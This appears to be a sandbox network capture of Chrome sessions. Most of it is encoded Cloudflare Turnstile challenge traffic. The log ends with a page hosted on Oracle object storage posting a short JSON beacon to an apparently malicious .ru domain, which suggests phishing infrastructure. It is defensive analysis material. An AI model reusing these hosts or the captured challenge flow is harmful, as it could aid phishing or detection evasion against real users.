                                                                          2024-10-29 15:50:58 UTC1369INData Raw: 56 33 69 49 61 57 73 37 65 72 69 5a 4f 75 6a 5a 4f 66 6d 36 36 7a 74 37 57 58 70 72 4f 37 68 36 4c 41 72 61 58 47 78 36 4b 30 6f 71 58 4e 78 61 4c 4f 76 4b 2b 38 30 4a 75 7a 74 39 58 45 6f 73 48 61 30 72 4f 6a 77 4d 44 68 37 65 4c 4f 35 39 2f 77 37 61 76 56 33 2b 6e 69 32 66 72 6f 7a 74 66 64 2f 72 37 53 34 4e 7a 67 37 67 48 6a 43 38 72 58 78 66 62 75 37 76 41 50 2f 76 50 38 39 4f 48 6c 44 64 48 5a 47 66 51 64 45 39 6b 68 41 4e 54 78 49 53 55 69 49 75 51 49 42 43 4d 6b 41 50 63 6e 4a 2b 72 71 4c 77 51 75 38 43 67 77 47 42 41 32 4d 77 67 4f 4d 7a 63 32 49 7a 38 58 4e 6a 67 2b 47 30 70 4c 4f 69 31 47 43 44 35 4a 51 69 5a 4c 4b 43 77 4f 55 7a 6b 34 50 45 38 59 57 6c 35 62 56 31 4a 43 55 6c 31 45 4e 57 4a 68 48 43 56 59 54 6d 5a 43 5a 6b 46 4d 62 57 55 77 55
                                                                          Data Ascii: V3iIaWs7eriZOujZOfm66zt7WXprO7h6LAraXGx6K0oqXNxaLOvK+80Juzt9XEosHa0rOjwMDh7eLO59/w7avV3+ni2froztfd/r7S4Nzg7gHjC8rXxfbu7vAP/vP89OHlDdHZGfQdE9khANTxISUiIuQIBCMkAPcnJ+rqLwQu8CgwGBA2MwgOMzc2Iz8XNjg+G0pLOi1GCD5JQiZLKCwOUzk4PE8YWl5bV1JCUl1ENWJhHCVYTmZCZkFMbWUwU
                                                                          2024-10-29 15:50:58 UTC1369INData Raw: 50 76 37 42 38 6d 35 2b 39 70 4a 36 57 74 6e 2b 37 69 4b 4f 6f 6e 59 6d 6d 78 62 2b 49 77 73 62 50 6c 73 32 54 73 36 54 4c 76 4a 71 39 75 74 66 4a 72 4e 53 66 6e 75 66 58 75 62 65 30 35 61 65 66 79 75 4c 4d 34 4b 33 4e 7a 2b 7a 47 7a 39 54 4b 79 64 4c 4c 37 4e 7a 63 38 74 4c 4b 33 4d 2f 7a 75 50 50 54 75 39 6a 6c 44 73 59 41 2f 75 44 6a 34 77 55 4d 41 65 77 4c 44 2b 76 78 44 51 62 7a 37 68 49 42 38 79 51 56 34 41 41 45 41 76 54 31 35 67 51 66 36 66 6b 4a 36 6a 48 74 43 79 62 78 42 52 49 55 4d 51 73 72 4c 7a 6a 2b 4e 76 73 63 44 54 51 6c 41 79 59 6a 51 44 49 56 50 51 67 48 55 45 41 69 49 42 31 4f 45 41 67 7a 53 7a 56 4a 4a 54 52 50 4e 78 35 4d 4c 42 30 56 50 45 45 33 4f 45 4d 35 53 7a 35 44 56 55 51 37 58 6d 64 6d 53 57 63 73 4d 31 56 6d 62 79 78 51 64 6a
                                                                          Data Ascii: Pv7B8m5+9pJ6Wtn+7iKOonYmmxb+IwsbPls2Ts6TLvJq9utfJrNSfnufXube05aefyuLM4K3Nz+zGz9TKydLL7Nzc8tLK3M/zuPPTu9jlDsYA/uDj4wUMAewLD+vxDQbz7hIB8yQV4AAEAvT15gQf6fkJ6jHtCybxBRIUMQsrLzj+NvscDTQlAyYjQDIVPQgHUEAiIB1OEAgzSzVJJTRPNx5MLB0VPEE3OEM5Sz5DVUQ7XmdmSWcsM1VmbyxQdj
                                                                          2024-10-29 15:50:58 UTC1369INData Raw: 74 62 69 53 6f 48 2b 6d 6d 61 4f 44 75 4a 69 71 6e 4a 36 64 71 62 43 32 6e 36 32 6b 71 71 53 78 75 4b 71 79 74 37 7a 42 6e 72 7a 41 73 61 47 2f 6e 39 53 79 77 37 6a 73 74 38 58 4c 34 4d 44 4d 35 74 61 2f 7a 38 54 57 77 39 62 49 7a 73 66 59 74 2b 7a 4b 32 2f 62 6d 30 65 44 6b 30 74 37 6a 2f 75 62 62 36 41 49 46 33 2b 77 48 33 75 48 77 7a 78 6e 6b 39 4e 50 79 35 76 6a 72 45 65 2f 35 41 66 62 76 41 2f 54 35 35 51 51 66 39 76 6b 49 2f 41 50 2b 44 42 45 44 43 78 44 76 43 77 67 53 47 53 6b 4b 47 41 77 78 43 78 77 52 52 52 49 67 41 43 4d 59 4a 51 51 76 47 79 6b 49 50 52 77 76 49 53 73 6b 4d 44 55 37 49 7a 56 50 4f 68 6f 34 50 55 30 33 50 42 78 48 4c 30 41 31 50 7a 68 45 58 6c 30 33 53 54 31 78 50 30 78 41 61 55 4e 52 56 57 56 45 55 6c 6c 47 4f 31 74 4e 55 31 4a
                                                                          Data Ascii: tbiSoH+mmaODuJiqnJ6dqbC2n62kqqSxuKqyt7zBnrzAsaG/n9Syw7jst8XL4MDM5ta/z8TWw9bIzsfYt+zK2/bm0eDk0t7j/ubb6AIF3+wH3uHwzxnk9NPy5vjrEe/5AfbvA/T55QQf9vkI/AP+DBEDCxDvCwgSGSkKGAwxCxwRRRIgACMYJQQvGykIPRwvISskMDU7IzVPOho4PU03PBxHL0A1PzhEXl03ST1xP0xAaUNRVWVEUllGO1tNU1J
                                                                          2024-10-29 15:50:58 UTC1369INData Raw: 73 53 5a 74 63 66 45 79 49 6d 77 77 4d 7a 51 70 37 4b 72 71 38 50 57 30 35 57 76 75 72 4f 37 79 39 37 62 6e 62 66 43 75 71 53 71 35 71 50 74 36 73 62 51 78 73 4c 73 35 76 54 41 30 64 6d 32 78 64 58 4f 75 64 4c 58 33 4e 62 54 2b 50 72 61 31 67 48 36 43 64 54 6a 2f 67 48 69 42 74 76 4b 33 4f 33 6d 30 65 6f 54 30 41 49 52 45 52 59 4a 2f 42 67 43 33 68 6f 42 48 52 58 33 41 2f 72 6b 36 69 55 4a 4c 69 6f 48 47 54 45 48 4c 51 44 75 4d 42 4d 4c 4e 50 6f 71 4c 79 34 33 47 78 4d 43 46 42 38 58 50 41 64 41 4a 55 70 43 49 7a 55 39 49 30 67 63 43 77 30 76 4b 45 41 58 52 6b 74 4b 57 44 63 76 4a 7a 42 4e 53 6a 68 4d 50 44 59 64 4a 31 5a 62 57 69 56 48 51 45 52 59 53 45 49 71 52 45 39 49 54 47 42 51 57 6a 45 37 61 6d 39 75 64 56 74 55 57 47 78 63 5a 6a 35 59 59 31 78 67
                                                                          Data Ascii: sSZtcfEyImwwMzQp7Krq8PW05WvurO7y97bnbfCuqSq5qPt6sbQxsLs5vTA0dm2xdXOudLX3NbT+Pra1gH6CdTj/gHiBtvK3O3m0eoT0AIRERYJ/BgC3hoBHRX3A/rk6iUJLioHGTEHLQDuMBMLNPoqLy43GxMCFB8XPAdAJUpCIzU9I0gcCw0vKEAXRktKWDcvJzBNSjhMPDYdJ1ZbWiVHQERYSEIqRE9ITGBQWjE7am9udVtUWGxcZj5YY1xg


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.1649736104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:51:02 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/602828571:1730216247:hU1JVbyKijtdUyJpcPx_11H0qSWFqnmCkoLtpOk75jI/8da452d5f8116bbc/Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXc HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 34186
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXc
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:51:02 UTC16384OUTData Raw: 76 5f 38 64 61 34 35 32 64 35 66 38 31 31 36 62 62 63 3d 63 42 66 51 34 69 38 53 67 54 66 6d 66 6d 53 44 46 38 34 79 31 5a 4c 70 79 53 38 43 25 32 62 79 6b 51 66 42 69 6c 79 48 79 79 64 42 69 6d 79 4e 51 54 42 69 69 79 32 69 79 44 4e 51 69 50 79 4f 51 70 67 79 50 79 6a 52 4a 4e 4e 33 79 4b 39 54 50 66 4d 51 77 4c 79 54 51 4e 79 6c 24 6f 6a 66 44 69 79 69 52 69 4a 79 4f 61 41 51 4a 39 44 51 69 70 79 76 51 69 4f 72 32 4c 71 44 66 53 79 71 51 44 4f 43 79 69 2b 68 4e 4e 79 38 61 51 38 49 4c 6e 48 61 68 79 44 24 79 69 55 6f 73 51 6b 53 68 56 66 46 79 56 67 56 37 75 6d 4d 73 78 6d 75 42 51 6b 38 24 72 77 76 69 69 51 46 51 32 48 37 79 38 57 76 79 79 6b 74 52 6a 30 5a 75 79 38 24 49 4e 34 61 56 4d 7a 43 38 74 74 79 24 75 46 59 42 75 35 35 44 74 50 43 65 6a 54 38
                                                                          Data Ascii: v_8da452d5f8116bbc=cBfQ4i8SgTfmfmSDF84y1ZLpyS8C%2bykQfBilyHyydBimyNQTBiiy2iyDNQiPyOQpgyPyjRJNN3yK9TPfMQwLyTQNyl$ojfDiyiRiJyOaAQJ9DQipyvQiOr2LqDfSyqQDOCyi+hNNy8aQ8ILnHahyD$yiUosQkShVfFyVgV7umMsxmuBQk8$rwviiQFQ2H7y8WvyyktRj0Zuy8$IN4aVMzC8tty$uFYBu55DtPCejT8
                                                                          2024-10-29 15:51:02 UTC16384OUTData Raw: 42 51 74 62 65 2d 33 49 69 68 65 6c 79 61 79 59 79 69 66 38 79 69 59 7a 49 79 75 79 30 66 79 4c 79 75 51 69 4e 38 51 79 35 79 79 79 77 4a 79 4b 67 4b 42 44 78 79 57 79 38 52 79 37 79 24 6c 57 62 42 76 79 55 73 77 66 69 4b 79 46 39 69 79 38 72 79 46 51 77 67 38 50 79 64 36 4b 39 69 46 79 35 51 63 56 44 50 79 54 4a 49 67 44 37 79 62 71 54 44 42 51 79 45 68 32 4c 42 4b 70 45 4e 6e 76 69 5a 70 34 4c 56 4e 77 53 65 38 68 34 49 55 48 4e 63 67 38 51 34 72 73 6f 68 32 4e 77 6b 6a 37 31 34 6f 79 79 79 46 32 76 38 52 79 49 61 30 74 79 6a 79 77 79 4d 61 42 74 79 70 67 63 52 77 53 79 55 2d 57 4f 64 45 37 67 4f 4b 7a 42 36 51 57 77 49 6c 79 4a 67 50 70 38 5a 55 65 67 2d 6d 79 46 69 6c 6a 5a 70 64 4c 79 67 79 46 6a 4b 6c 44 69 4e 35 61 64 2d 7a 6f 42 61 73 4b 64 42 72
                                                                          Data Ascii: BQtbe-3IihelyayYyif8yiYzIyuy0fyLyuQiN8Qy5yyywJyKgKBDxyWy8Ry7y$lWbBvyUswfiKyF9iy8ryFQwg8Pyd6K9iFy5QcVDPyTJIgD7ybqTDBQyEh2LBKpENnviZp4LVNwSe8h4IUHNcg8Q4rsoh2Nwkj714oyyyF2v8RyIa0tyjywyMaBtypgcRwSyU-WOdE7gOKzB6QWwIlyJgPp8ZUeg-myFiljZpdLygyFjKlDiN5ad-zoBasKdBr
                                                                          2024-10-29 15:51:02 UTC1418OUTData Raw: 7a 42 66 4b 66 24 36 79 39 4a 4b 42 2d 4a 42 50 79 56 73 2d 53 38 69 77 24 39 79 4a 49 4c 57 74 48 32 53 38 74 76 38 59 79 69 35 24 38 54 63 24 70 51 56 64 45 33 5a 36 51 51 6f 61 51 79 76 51 72 52 63 53 61 41 6a 54 71 47 51 35 79 43 46 4a 6a 73 69 32 66 6f 70 67 6c 6a 42 79 4e 2b 44 6c 6e 4d 79 4b 4b 7a 66 5a 2b 79 6a 6a 69 70 6d 41 79 38 66 79 42 79 72 51 43 45 62 51 38 56 79 32 46 70 74 69 4a 79 35 6d 41 39 69 35 35 42 48 4d 31 6c 36 79 62 79 66 6d 72 6f 79 53 4e 54 63 34 53 38 4c 69 56 74 6e 63 70 35 79 4c 64 24 48 79 41 4c 78 67 69 38 53 4d 79 38 4d 6e 5a 79 59 64 79 64 59 2b 79 48 54 24 35 74 76 51 55 49 79 51 44 4f 41 39 71 4e 72 49 6f 59 51 47 64 4a 24 6a 52 54 79 4c 6a 74 49 35 41 46 66 54 55 67 4e 47 39 4a 4e 69 6a 45 4b 37 56 32 5a 42 4d 45 51
                                                                          Data Ascii: zBfKf$6y9JKB-JBPyVs-S8iw$9yJILWtH2S8tv8Yyi5$8Tc$pQVdE3Z6QQoaQyvQrRcSaAjTqGQ5yCFJjsi2fopgljByN+DlnMyKKzfZ+yjjipmAy8fyByrQCEbQ8Vy2FptiJy5mA9i55BHM1l6ybyfmroySNTc4S8LiVtncp5yLd$HyALxgi8SMy8MnZyYdydY+yHT$5tvQUIyQDOA9qNrIoYQGdJ$jRTyLjtI5AFfTUgNG9JNijEK7V2ZBMEQ
                                                                          2024-10-29 15:51:02 UTC1300INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:51:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 4704
                                                                          Connection: close
                                                                          cf-chl-out-s: 3/fJevCi8p1rwfcxNFrTJY119lsVtrob8FlYgiA6WzFpfpixc4owp/Da60qFquHB9veMf1U1x5koE5TVcY3HVgKYjbl4O6jtCfxjOa8VdWAK2OHrwZfX2GkBxgZvjRdBbjq+ps4ckyfIMSZwquKfQy94kFcFrTk8diWUeiw3nk/GPGbBvf+nOz2fefDWn98zDGQCQJUQ7fe9QTSyYzs70YK8RDA5PKss0SrSF5sYxXEkrLoNTEP0ohwAAasfjrplbOuC+j7t1BbxWMLdfCQ/dLZDlEXxzVTzh24ptz1H2ACCZR4GMxQQshqJ9LXWWsAlSKkLOapRYvki9WRolSQkwXw36GDMCebLezbNaMI6D6o8zlwtsc6/lVNQshM8sFDsfs6hM5CZmcI5xJVBA3z9WmwvBBktoHs6bHBV4l4yJuwNRfKLFy+NiK6dhulmnZnxEmi5RrYNfUsUb37w2To1EWJYyyGaAFf8NhSp2TvxOEmth6IYgq0geITdTM2m9aJjhkH9OITnMruyHLEBy17Nc5S2lzwsD3pZBMoyegdssJRZribP+sIUAI2g9mypTv5bBw33oLAgPdRmmXxJL7QkW5buv+wx+krZQF8Q7aeIJB9K9vj4qgg3oZzvXpwkS7NTeCwiElpIKiVm0d8JkJCq2deRILWOsBVLyyxhvBsmEkC91AkCBiq6zCRwDiOtomkRZSDPOmPA6hv0eRusfNeHwUH2FlSswL0rTvRwiM/PwjaV4OxNbL1/XS+7DNzMtgl2J+jWMHiIZXB3BJn+1cwBNoNzorZ4CuwYSXjI/I4CK/8joxPmtM+AtybbXbg/+pm5x/hiGDd1jsvhvQJEvwJYoUwU7ZJAt4oMWXQMleJCHl6JNyQ90IPG/yigTDf9HVBD0aKgGdcJFJE1txZml40H2gNkicPuB4ZfKK2H1/xJSML+pv+Oim/3vJR0PjnxzWM08eu+gs3dASb/tWOTlDJV/f8a1H3OpJNZOKMSHq4U5rfEN3v6UO [TRUNCATED]
                                                                          2024-10-29 15:51:02 UTC233INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 75 39 57 46 54 45 72 6b 31 44 31 53 78 41 46 64 38 33 6f 6a 61 65 42 44 2f 6a 69 67 6f 7a 39 77 32 43 59 51 74 6a 74 6a 38 74 49 56 6f 61 35 76 4e 6c 6d 61 5a 34 43 33 66 4e 36 59 6c 48 63 4e 56 57 59 74 45 44 4f 58 36 4e 55 74 78 6f 63 55 66 7a 62 68 38 56 78 42 73 52 73 45 6d 6d 6b 7a 4a 2f 2f 66 4a 50 6c 76 63 45 2f 64 6a 30 63 33 68 50 59 55 6a 5a 55 3d 24 52 6f 6e 6e 47 33 44 55 44 48 77 5a 5a 4f 70 35 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 61 34 35 33 31 65 61 39 33 66 36 63 38 30 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                          Data Ascii: cf-chl-out: u9WFTErk1D1SxAFd83ojaeBD/jigoz9w2CYQtjtj8tIVoa5vNlmaZ4C3fN6YlHcNVWYtEDOX6NUtxocUfzbh8VxBsRsEmmkzJ//fJPlvcE/dj0c3hPYUjZU=$RonnG3DUDHwZZOp5Server: cloudflareCF-RAY: 8da4531ea93f6c80-DFWalt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:51:02 UTC1205INData Raw: 6b 4a 56 74 63 59 61 4e 57 6f 70 39 6b 4a 32 55 69 56 70 63 6d 6c 61 58 6e 70 57 69 6b 58 78 6a 70 61 57 49 6f 72 46 36 71 61 75 6f 6c 61 36 4b 71 33 57 50 67 36 75 61 6b 4b 65 41 77 49 47 65 6b 62 53 46 6f 70 4b 52 79 4c 69 58 79 35 61 62 6d 61 36 6f 75 35 53 64 77 4b 69 6c 6f 73 53 34 70 61 66 51 75 36 6d 2b 72 4d 75 68 76 62 36 2b 73 75 6a 47 77 62 58 4b 76 4e 65 74 33 38 62 4b 76 63 33 47 30 73 58 52 31 39 6e 77 2b 74 37 4b 7a 64 6e 61 39 63 37 64 76 65 54 54 43 4f 62 58 31 65 72 73 39 39 41 51 32 75 72 63 46 4f 34 54 35 66 48 75 35 75 6a 32 43 66 7a 70 2f 42 73 4d 34 66 34 44 39 66 55 43 35 66 63 46 41 51 2f 6d 4d 43 73 42 42 42 30 6c 4c 43 44 7a 4a 68 6f 7a 43 52 6f 6f 4d 78 55 4e 49 69 41 44 44 6b 68 44 4e 79 6f 73 51 67 51 67 4b 67 39 49 51 69 34
                                                                          Data Ascii: kJVtcYaNWop9kJ2UiVpcmlaXnpWikXxjpaWIorF6qauola6Kq3WPg6uakKeAwIGekbSFopKRyLiXy5abma6ou5SdwKilosS4pafQu6m+rMuhvb6+sujGwbXKvNet38bKvc3G0sXR19nw+t7Kzdna9c7dveTTCObX1ers99AQ2urcFO4T5fHu5uj2Cfzp/BsM4f4D9fUC5fcFAQ/mMCsBBB0lLCDzJhozCRooMxUNIiADDkhDNyosQgQgKg9IQi4
                                                                          2024-10-29 15:51:02 UTC1369INData Raw: 52 63 57 32 68 63 57 42 43 49 57 45 77 6f 6c 36 43 63 4e 2f 75 30 50 47 68 6f 53 48 77 54 75 47 43 55 79 47 43 34 6f 4a 52 51 58 4e 79 45 75 4f 53 38 56 4f 6a 73 30 51 6a 5a 4a 51 41 67 36 4e 7a 73 50 4d 43 6f 38 4a 53 38 4e 53 68 63 76 58 46 41 2b 50 31 5a 57 57 55 4d 6a 58 6a 63 38 55 31 4e 68 52 47 4a 68 56 57 55 68 61 31 42 49 53 6d 5a 72 62 6e 64 77 57 6b 39 37 61 6e 52 55 58 58 45 39 66 6e 42 2b 56 49 46 44 64 31 6f 38 65 48 39 4b 68 55 36 4b 59 49 4b 4c 69 33 57 4b 64 34 61 4d 55 6c 4b 48 57 32 39 65 6b 48 43 69 63 5a 53 64 6d 6f 43 6a 6e 70 4a 69 6f 71 57 61 67 61 65 53 73 6d 79 71 6e 71 4b 71 71 35 69 51 6c 62 47 64 6b 4c 4b 74 65 35 4f 43 75 61 32 55 70 62 65 59 6b 34 58 48 77 73 72 4e 77 59 79 53 6a 37 2b 31 72 49 37 43 75 4d 33 5a 78 37 36 62
                                                                          Data Ascii: RcW2hcWBCIWEwol6CcN/u0PGhoSHwTuGCUyGC4oJRQXNyEuOS8VOjs0QjZJQAg6NzsPMCo8JS8NShcvXFA+P1ZWWUMjXjc8U1NhRGJhVWUha1BISmZrbndwWk97anRUXXE9fnB+VIFDd1o8eH9KhU6KYIKLi3WKd4aMUlKHW29ekHCicZSdmoCjnpJioqWagaeSsmyqnqKqq5iQlbGdkLKte5OCua2UpbeYk4XHwsrNwYySj7+1rI7CuM3Zx76b
                                                                          2024-10-29 15:51:02 UTC1369INData Raw: 55 61 34 2f 45 4b 48 51 55 67 42 69 34 49 44 53 49 72 37 41 30 6b 45 2b 30 32 39 77 73 30 4c 54 73 65 50 42 63 54 46 77 41 6a 49 43 55 2f 46 53 73 6e 49 43 6b 62 48 30 68 4d 53 46 4d 67 52 44 55 57 49 56 51 6b 55 79 34 64 53 68 6f 62 55 32 4e 58 52 54 5a 4f 57 55 46 47 56 43 4a 6c 50 69 52 49 4c 6c 42 67 52 30 46 54 59 56 56 75 52 47 49 79 56 58 4a 59 53 33 4d 33 58 45 39 78 57 56 4e 61 67 49 56 34 56 6b 4a 6b 54 57 78 5a 57 58 74 53 58 47 35 6d 5a 4a 56 78 63 56 5a 6b 69 70 39 65 61 59 35 64 63 6d 32 45 65 47 57 51 67 70 4b 6c 6a 61 6d 47 6a 59 46 39 68 35 4b 48 62 49 4f 4c 73 4c 57 4b 68 6d 36 55 76 4b 36 4d 6d 4c 52 39 64 70 32 65 6c 70 47 69 6f 71 79 56 6d 70 6d 49 69 38 69 67 73 63 79 4c 30 63 76 45 77 64 57 74 70 62 4f 31 7a 4a 72 4f 72 63 32 67 30
                                                                          Data Ascii: Ua4/EKHQUgBi4IDSIr7A0kE+029ws0LTsePBcTFwAjICU/FSsnICkbH0hMSFMgRDUWIVQkUy4dShobU2NXRTZOWUFGVCJlPiRILlBgR0FTYVVuRGIyVXJYS3M3XE9xWVNagIV4VkJkTWxZWXtSXG5mZJVxcVZkip9eaY5dcm2EeGWQgpKljamGjYF9h5KHbIOLsLWKhm6UvK6MmLR9dp2elpGioqyVmpmIi8igscyL0cvEwdWtpbO1zJrOrc2g0
                                                                          2024-10-29 15:51:02 UTC761INData Raw: 6c 43 43 4d 6a 4a 78 44 72 49 77 4d 71 37 6a 49 48 4b 68 73 30 4d 79 34 57 4d 66 30 63 4e 7a 4d 6d 4a 44 51 32 42 53 67 6b 50 77 6b 35 43 7a 34 78 52 67 74 50 53 69 77 2f 53 43 70 47 58 46 4a 53 58 56 5a 4c 56 6a 42 61 58 7a 5a 57 55 6c 4a 65 4d 79 56 4c 54 46 70 6c 57 46 6c 65 5a 47 39 56 61 57 4a 72 57 6e 70 73 61 54 6c 49 67 47 68 69 50 6e 6c 2f 66 58 56 42 63 33 39 32 63 34 4f 47 57 30 47 43 54 49 56 4d 67 49 74 72 55 4a 4f 4f 6a 56 57 51 62 5a 56 61 6d 48 4f 4b 6a 4a 42 66 59 35 4f 61 69 5a 61 45 6d 61 4b 75 61 61 64 73 63 6d 75 6e 62 57 39 75 70 34 71 6d 72 61 5a 35 6e 4c 43 73 6f 49 4b 42 73 72 32 55 6c 72 7a 43 6f 4d 48 41 69 4c 61 68 79 73 61 6e 79 73 61 30 76 73 76 4e 6b 37 50 47 31 4b 37 65 31 4d 2b 62 74 4e 6a 62 33 4b 50 6d 32 4c 6a 65 77 39
                                                                          Data Ascii: lCCMjJxDrIwMq7jIHKhs0My4WMf0cNzMmJDQ2BSgkPwk5Cz4xRgtPSiw/SCpGXFJSXVZLVjBaXzZWUlJeMyVLTFplWFleZG9VaWJrWnpsaTlIgGhiPnl/fXVBc392c4OGW0GCTIVMgItrUJOOjVWQbZVamHOKjJBfY5OaiZaEmaKuaadscmunbW9up4qmraZ5nLCsoIKBsr2UlrzCoMHAiLahysanysa0vsvNk7PG1K7e1M+btNjb3KPm2Ljew9


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.2.1649737104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:51:03 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/602828571:1730216247:hU1JVbyKijtdUyJpcPx_11H0qSWFqnmCkoLtpOk75jI/8da452d5f8116bbc/Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXc HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:51:03 UTC379INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 29 Oct 2024 15:51:03 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 7
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          cf-chl-out: nkMUmMS6d42jwY2xeWWisEwCxXL5gu2ovEg=$s8TUNtJK5AissmSp
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da453249879460c-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:51:03 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                          Data Ascii: invalid


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.1649739188.114.97.34436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:51:04 UTC701OUTPOST // HTTP/1.1
                                                                          Host: axelkirchhoffh.ru
                                                                          Connection: keep-alive
                                                                          Content-Length: 23
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Content-Type: text/plain;charset=UTF-8
                                                                          Accept: */*
                                                                          Origin: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:51:04 UTC23OUTData Raw: 7b 22 63 61 64 64 69 73 68 6e 65 73 73 22 3a 22 7a 69 6e 67 79 22 7d
                                                                          Data Ascii: {"caddishness":"zingy"}
                                                                          2024-10-29 15:51:41 UTC855INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:51:41 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          x-powered-by: PHP/7.3.33
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fbhqcz2ABzVzo6a%2FQeHL3MjMNCsWxBooTNo1qhVo7mtF1xKjiirL6pdpjPNjrIVQFvWTeh83KRQOC7MAC%2FMIIAt2TTgddHHCouFLj%2FjsaPOQz3%2ByMFfAJQ8AqwjrGhHUsit8sg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da4532a79d4e74a-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1325&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1324&delivery_rate=2162808&cwnd=32&unsent_bytes=0&cid=642728eb0a414c50&ts=37338&x=0"
